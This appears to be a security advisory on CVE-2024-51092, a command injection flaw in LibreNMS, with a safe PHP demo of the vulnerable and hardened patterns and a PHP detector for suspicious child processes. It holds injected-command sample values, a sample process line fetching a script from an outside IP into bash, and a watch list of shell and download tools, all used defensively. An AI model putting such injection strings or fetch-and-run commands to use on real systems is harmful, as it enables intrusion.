LibreNMS Pre-24.10.0 RCE via OS Command Injection (CVE-2024-51092)
CVE-2024-51092 (CVSS 9.1): LibreNMS before 24.10.0 allows unauthenticated remote attackers to execute arbitrary OS commands via AboutController.php, SettingsController.php, and...

Executive Summary
LibreNMS, an open-source network monitoring platform used by thousands of organizations, contains a critical OS command injection vulnerability tracked as CVE-2024-51092 with a CVSS score of 9.1. The flaw affects all versions before 24.10.0 and allows a remote, unauthenticated attacker to execute arbitrary operating system commands on the underlying server. The vulnerability resides in three separate code paths: AboutController.php's index() method, SettingsController.php's update() method, and PollDevice.php's initRrdDirectory() function. An advisory published by the LibreNMS maintainers on GitHub confirms the issue and provides patched code. No evidence of active exploitation in the wild has been reported as of this writing, but the ease of exploitation and the privileged position of LibreNMS servers on internal networks make this a high-priority patch target.
Technical Analysis
According to the GitHub security advisory, the injection occurs when user-supplied input is passed unsanitized to system-level command execution functions. The three affected code paths each handle different functionality:

- AboutController.php (index()): This controller displays system information about the LibreNMS installation. It builds a command string that incorporates user-controllable values, such as those used for the version check or diagnostic output, without escaping them. An attacker can inject shell metacharacters (e.g. `;`, `|`, `&&`) to append arbitrary commands.
- SettingsController.php (update()): This endpoint processes configuration updates submitted by administrators. The advisory notes that update() writes to configuration files via shell commands that incorporate untrusted input. In default configurations this endpoint is reachable only by an authenticated user, and the advisory text summarised here does not spell out the attack surface. Note that the CVSS score of 9.1 does not by itself imply that no privileges are required: a vector with high privileges and changed scope (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) also scores exactly 9.1, so the score alone cannot settle whether the vector is unauthenticated.
- PollDevice.php (initRrdDirectory()): This function creates the RRD (Round-Robin Database) directory for each monitored device. The directory path is derived from the device hostname or IP address, a value that is supplied when the device is added or discovered and can therefore be manipulated. An attacker who can add a malicious device to the monitoring scope, or who can poison DNS entries resolved by the LibreNMS server during discovery, can trigger command execution when the poller initialises the RRD storage.
The advisory does not include proof-of-concept exploit code, but the nature of the injection (OS command injection in PHP applications) is well-understood. Attackers would likely chain this with network reconnaissance to locate LibreNMS instances, then use the shell access to pivot laterally, exfiltrate SNMP community strings, or deploy ransomware.
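The injection pattern described above, shown as an added example in PHP that is not LibreNMS's own code: the function names, the `/opt/librenms/rrd` base path, the sample hostnames and the idea of a configurable binary path are all assumptions made for the illustration. The vulnerable function only returns the command string it would run, so the script is safe to execute and shows exactly what `/bin/sh` would receive, next to two hardened forms (quoting with `escapeshellarg()`, and avoiding the shell entirely with an allow-list plus PHP's native `mkdir()`).

```php
<?php
declare(strict_types=1);

// Illustration added for this article; it is not LibreNMS's code and the
// function names, the RRD base path and the sample hostnames are assumptions.
// The vulnerable function only RETURNS the command it would run, so this
// script is safe to execute and lets you inspect what /bin/sh would receive.

// Constructed inputs: a legitimate hostname and one carrying shell metacharacters.
const SAMPLE_HOSTS = [
    'core-sw1.example.net',
    'core-sw1.example.net; id > /tmp/pwned',   // assumed attacker-controlled value
];

// VULNERABLE pattern: an untrusted value interpolated into a shell command string.
// With the second sample host the shell sees two commands, not one argument.
function vulnerableRrdInit(string $rrdBase, string $hostname): string
{
    $cmd = "mkdir -p {$rrdBase}/{$hostname}";
    // shell_exec($cmd);   // deliberately not executed in this demo
    return $cmd;
}

// HARDENED pattern 1: when a shell is unavoidable, quote every untrusted token.
// escapeshellarg() single-quotes the value and escapes embedded quotes, so the
// metacharacters reach mkdir inside one argument instead of being parsed.
function hardenedRrdInitShell(string $rrdBase, string $hostname): string
{
    return 'mkdir -p ' . escapeshellarg($rrdBase . '/' . $hostname);
}

// HARDENED pattern 2 (preferred): no shell at all. Reject anything that is not
// a plausible hostname or address, then use PHP's own filesystem API.
function hardenedRrdInitNative(string $rrdBase, string $hostname): string
{
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._:-]{0,253}$/', $hostname)) {
        throw new InvalidArgumentException("refusing hostname: {$hostname}");
    }
    $dir = $rrdBase . DIRECTORY_SEPARATOR . $hostname;
    if (!is_dir($dir) && !mkdir($dir, 0775, true) && !is_dir($dir)) {
        throw new RuntimeException("cannot create {$dir}");
    }
    return $dir;
}

// The same rule applies to settings-derived values such as a configurable
// binary path (an assumed example of the kind of value an about page or
// poller passes to the shell): quote it before building the command.
function versionCommand(string $binaryPath): string
{
    return escapeshellarg($binaryPath) . ' --version';
}

foreach (SAMPLE_HOSTS as $host) {
    echo "input:       {$host}\n";
    echo "vulnerable:  " . vulnerableRrdInit('/opt/librenms/rrd', $host) . "\n";
    echo "escaped:     " . hardenedRrdInitShell('/opt/librenms/rrd', $host) . "\n";
    try {
        echo "native:      " . hardenedRrdInitNative(sys_get_temp_dir() . '/rrd-demo', $host) . "\n";
    } catch (InvalidArgumentException $e) {
        echo "native:      rejected ({$e->getMessage()})\n";
    }
    echo "\n";
}
echo versionCommand('/usr/bin/rrdtool; touch /tmp/pwned') . "\n";
```

Run it with `php rrd-demo.php`. For the second hostname the vulnerable form yields `mkdir -p /opt/librenms/rrd/core-sw1.example.net; id > /tmp/pwned`, which a shell executes as two commands, while the escaped form wraps the whole path in single quotes and the native form rejects the value before any filesystem call. Removing the shell from the path, rather than escaping for it, is the fix that also survives future refactoring.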
Mitigations & Recommendations
The only complete mitigation is to upgrade LibreNMS to version 24.10.0 or later. The maintainers released this version with input sanitization and command escaping fixes for all three vulnerable code paths. There is no reliable workaround — disabling the affected controllers would break core monitoring functionality. Defenders should:
- Immediately upgrade all LibreNMS instances to 24.10.0 or newer. The upgrade process is documented in the project's official upgrade guide.
- Audit network exposure of LibreNMS web interfaces. If the web UI must be accessible from the internet, place it behind a VPN or reverse proxy with strict access controls. The CVSS attack vector is "network" (AV:N), meaning remote exploitation is possible.
- Monitor for anomalous command execution on LibreNMS servers. Look for unexpected processes spawned by the web server or poller user (typically `www-data` or `librenms`), especially shells and download tools such as `sh`, `bash`, `curl`, `wget`, or `python`.
- Review device discovery logs for suspicious hostnames or IPs that could trigger the PollDevice.php injection path. Restrict SNMP and ICMP discovery to trusted subnets.
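One way to implement the process-monitoring check from the first bullet, as an added example in PHP (chosen because PHP is already present on every LibreNMS host) that is not part of the project: the script parses `ps -eo user,pid,ppid,args` output, an assumed input format, and flags shells and download tools whose ancestry passes through a web-server worker running as one of the web accounts. The process listing, pids, hostnames and staging URL below are constructed for the example.

```php
<?php
declare(strict_types=1);

// Detection example added for this article; not LibreNMS code. It expects the
// output of `ps -eo user,pid,ppid,args` and flags interpreters or download
// tools that descend from a web-server worker. The listing below is constructed
// for the example; the pids, hosts and URL are made up.

const SAMPLE_PS = <<<'PS'
USER       PID  PPID ARGS
root         1     0 /sbin/init
root       812     1 php-fpm: master process (/etc/php/8.2/fpm/php-fpm.conf)
www-data   901   812 php-fpm: pool www
www-data   902   812 php-fpm: pool www
librenms  1203     1 /usr/bin/python3 /opt/librenms/librenms-service.py
librenms  1340  1203 /usr/bin/php /opt/librenms/poller.php -h core-sw1.example.net
librenms  1341  1340 /usr/bin/snmpbulkwalk -v2c -c public core-sw1.example.net
www-data  2210   902 sh -c mkdir -p /opt/librenms/rrd/core-sw1.example.net; id > /tmp/pwned
www-data  2211  2210 curl -s http://198.51.100.7/stage.sh
www-data  2212  2211 bash
PS;

// Binaries that have no business descending from the web tier.
const SUSPICIOUS_BINARIES = ['sh', 'bash', 'dash', 'curl', 'wget', 'python', 'python3', 'perl', 'nc', 'ncat'];
// Accounts the web server and the LibreNMS application run as (adjust for your install).
const WEB_USERS = ['www-data', 'librenms', 'apache', 'nginx'];

/** Parse ps output into pid => [user, ppid, args]; the first line is the header. */
function parsePs(string $text): array
{
    $procs = [];
    foreach (explode("\n", trim($text)) as $i => $line) {
        $parts = preg_split('/\s+/', trim($line), 4);
        if ($i === 0 || count($parts) < 4) {
            continue;
        }
        [$user, $pid, $ppid, $args] = $parts;
        $procs[(int) $pid] = ['user' => $user, 'ppid' => (int) $ppid, 'args' => $args];
    }
    return $procs;
}

/** True for a PHP-FPM/Apache/nginx worker owned by one of the web accounts. */
function isWebWorker(array $p): bool
{
    return in_array($p['user'], WEB_USERS, true)
        && preg_match('/^(php-fpm|apache2|httpd|nginx)\b/', $p['args']) === 1;
}

/** Return pid => details for suspicious binaries whose ancestry passes through a web worker. */
function findSuspicious(array $procs): array
{
    $hits = [];
    foreach ($procs as $pid => $p) {
        $bin = basename(explode(' ', $p['args'], 2)[0]);
        if (!in_array($bin, SUSPICIOUS_BINARIES, true)) {
            continue;
        }
        // Walk the parent chain; the depth bound guards against cycles in bad input.
        for ($cur = $p['ppid'], $depth = 0; isset($procs[$cur]) && $depth < 64; $cur = $procs[$cur]['ppid'], $depth++) {
            if (isWebWorker($procs[$cur])) {
                $hits[$pid] = ['bin' => $bin, 'web_worker' => $cur, 'args' => $p['args']];
                break;
            }
        }
    }
    return $hits;
}

// Pass "-" as the first argument to read a live listing from stdin:
//   ps -eo user,pid,ppid,args | php detect.php -
$input = ($argc > 1 && $argv[1] === '-') ? stream_get_contents(STDIN) : SAMPLE_PS;
foreach (findSuspicious(parsePs($input)) as $pid => $h) {
    printf("ALERT pid=%d bin=%s web-worker-ancestor=%d cmd=%s\n", $pid, $h['bin'], $h['web_worker'], $h['args']);
}
```

On the constructed listing the script alerts on pids 2210, 2211 and 2212 (the injected `sh -c` and its `curl` and `bash` children under the `php-fpm` worker 902) and stays silent on the legitimate poller chain, because `poller.php` and `snmpbulkwalk` are neither suspicious binaries nor descendants of a web worker. Run it from cron or a monitoring agent with the `-` argument to scan the live process table; pair it with auditd `execve` rules keyed on the web user if you need a durable record rather than a point-in-time snapshot.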
No indicators of compromise (IOCs) have been published by the maintainers or by third-party researchers as of this report. The advisory does not mention any active exploitation campaigns.

